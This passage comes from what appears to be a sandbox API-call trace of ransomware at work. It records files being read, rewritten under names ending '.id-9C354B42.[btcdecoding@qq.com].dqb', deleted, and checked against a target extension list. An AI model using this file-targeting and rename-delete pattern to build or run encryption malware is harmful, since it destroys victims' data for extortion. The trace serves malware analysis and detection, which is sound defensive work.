lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.983] GetLastError () returned 0x0 [0045.983] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x47cc, lpOverlapped=0x0) returned 1 [0045.985] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x47d0, lpOverlapped=0x0) returned 1 [0045.986] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.986] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.986] SetEndOfFile (hFile=0x208) returned 1 [0045.986] CloseHandle (hObject=0x208) returned 1 [0045.987] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.987] SetEndOfFile (hFile=0x214) returned 1 [0045.987] CloseHandle (hObject=0x214) returned 1 [0045.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.988] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0045.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.988] lstrlenW (lpString=".doc") returned 4 [0045.988] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.988] lstrlenW (lpString=".docx") returned 5 [0045.988] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.988] lstrlenW (lpString=".pdf") returned 4 [0045.988] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.988] lstrlenW (lpString=".xls") returned 4 [0045.988] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.988] lstrlenW (lpString=".xlsx") returned 5 [0045.988] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.988] lstrlenW (lpString=".ppt") returned 4 [0045.988] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.988] lstrlenW (lpString=".zip") returned 4 [0045.988] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.988] lstrlenW (lpString=".rar") returned 4 [0045.988] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.988] lstrlenW (lpString=".bz2") returned 4 [0045.988] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.988] lstrlenW (lpString=".7z") returned 3 [0045.988] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.988] lstrlenW (lpString=".dbf") returned 4 [0045.988] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.988] lstrlenW (lpString=".1cd") returned 4 [0045.988] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".jpg") returned 4 [0045.989] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".doc") returned 4 [0045.989] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".docx") returned 5 [0045.989] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.989] lstrlenW (lpString=".pdf") returned 4 [0045.989] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".xls") returned 4 [0045.989] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".xlsx") returned 5 [0045.989] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.989] lstrlenW (lpString=".ppt") returned 4 [0045.989] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".zip") returned 4 [0045.989] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".rar") returned 4 [0045.989] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.989] lstrlenW (lpString=".bz2") returned 4 [0045.989] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString=".7z") returned 3 [0045.989] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".dbf") returned 4 [0045.989] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".1cd") returned 4 [0045.989] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0045.989] lstrlenW (lpString=".jpg") returned 4 [0045.989] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.990] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.990] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.990] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=4991) returned 1 [0045.990] CloseHandle (hObject=0x214) returned 1 [0045.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 0x20 [0045.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.990] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.990] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.992] GetLastError () returned 0x0 [0045.992] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x137f, lpOverlapped=0x0) returned 1 [0045.994] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1380, lpOverlapped=0x0) returned 1 [0045.995] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.995] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.995] SetEndOfFile (hFile=0x208) returned 1 [0045.995] CloseHandle (hObject=0x208) returned 1 [0045.995] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.995] SetEndOfFile (hFile=0x214) returned 1 [0045.996] CloseHandle (hObject=0x214) returned 1 [0045.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.996] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1 [0045.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.996] lstrlenW (lpString=".doc") returned 4 [0045.996] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString=".docx") returned 5 [0045.997] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.997] lstrlenW (lpString=".pdf") returned 4 [0045.997] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".xls") returned 4 [0045.997] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".xlsx") returned 5 [0045.997] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.997] lstrlenW (lpString=".ppt") returned 4 [0045.997] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString=".zip") returned 4 [0045.997] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".rar") returned 4 [0045.997] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString=".bz2") returned 4 [0045.997] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString=".7z") returned 3 [0045.997] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString=".dbf") returned 4 [0045.997] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString=".1cd") returned 4 [0045.997] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString=".jpg") returned 4 [0045.997] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.997] lstrlenW (lpString=".doc") returned 4 [0045.997] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.997] lstrlenW (lpString=".docx") returned 5 [0045.997] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.998] lstrlenW (lpString=".pdf") returned 4 [0045.998] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".xls") returned 4 [0045.998] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".xlsx") returned 5 [0045.998] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.998] lstrlenW (lpString=".ppt") returned 4 [0045.998] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.998] lstrlenW (lpString=".zip") returned 4 [0045.998] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".rar") returned 4 [0045.998] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.998] lstrlenW (lpString=".bz2") returned 4 [0045.998] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString=".7z") returned 3 [0045.998] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.998] lstrlenW (lpString=".dbf") returned 4 [0045.998] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.998] lstrlenW (lpString=".1cd") returned 4 [0045.998] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0045.998] lstrlenW (lpString=".jpg") returned 4 [0045.998] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.998] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0045.998] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.999] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=44302) returned 1 [0045.999] CloseHandle (hObject=0x214) returned 1 [0045.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20 [0045.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.999] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.999] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.999] GetLastError () returned 0x0 [0045.999] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xad0e, lpOverlapped=0x0) returned 1 [0046.002] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xad10, lpOverlapped=0x0) returned 1 [0046.004] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.004] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.004] SetEndOfFile (hFile=0x208) returned 1 [0046.004] CloseHandle (hObject=0x208) returned 1 [0046.004] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.004] SetEndOfFile (hFile=0x214) returned 1 [0046.005] CloseHandle (hObject=0x214) returned 1 [0046.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.006] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0046.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.006] lstrlenW (lpString=".doc") returned 4 [0046.006] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.006] lstrlenW (lpString=".docx") returned 5 [0046.006] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.006] lstrlenW (lpString=".pdf") returned 4 [0046.006] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.006] lstrlenW (lpString=".xls") returned 4 [0046.006] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.006] lstrlenW (lpString=".xlsx") returned 5 [0046.006] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.006] lstrlenW (lpString=".ppt") returned 4 [0046.006] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.006] lstrlenW (lpString=".zip") returned 4 [0046.006] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.006] lstrlenW (lpString=".rar") returned 4 [0046.006] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.006] lstrlenW (lpString=".bz2") returned 4 [0046.006] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.006] lstrlenW (lpString=".7z") returned 3 [0046.006] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.006] lstrlenW (lpString=".dbf") returned 4 [0046.006] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".1cd") returned 4 [0046.007] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".jpg") returned 4 [0046.007] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".doc") returned 4 [0046.007] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString=".docx") returned 5 [0046.007] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.007] lstrlenW (lpString=".pdf") returned 4 [0046.007] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString=".xls") returned 4 [0046.007] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.007] lstrlenW (lpString=".xlsx") returned 5 [0046.007] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.007] lstrlenW (lpString=".ppt") returned 4 [0046.007] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".zip") returned 4 [0046.007] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.007] lstrlenW (lpString=".rar") returned 4 [0046.007] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.007] lstrlenW (lpString=".bz2") returned 4 [0046.007] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString=".7z") returned 3 [0046.007] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".dbf") returned 4 [0046.007] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".1cd") returned 4 [0046.007] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0046.007] lstrlenW (lpString=".jpg") returned 4 [0046.007] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.008] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0046.008] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.008] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2668) returned 1 [0046.008] CloseHandle (hObject=0x214) returned 1 [0046.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 0x20 [0046.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.008] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.008] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 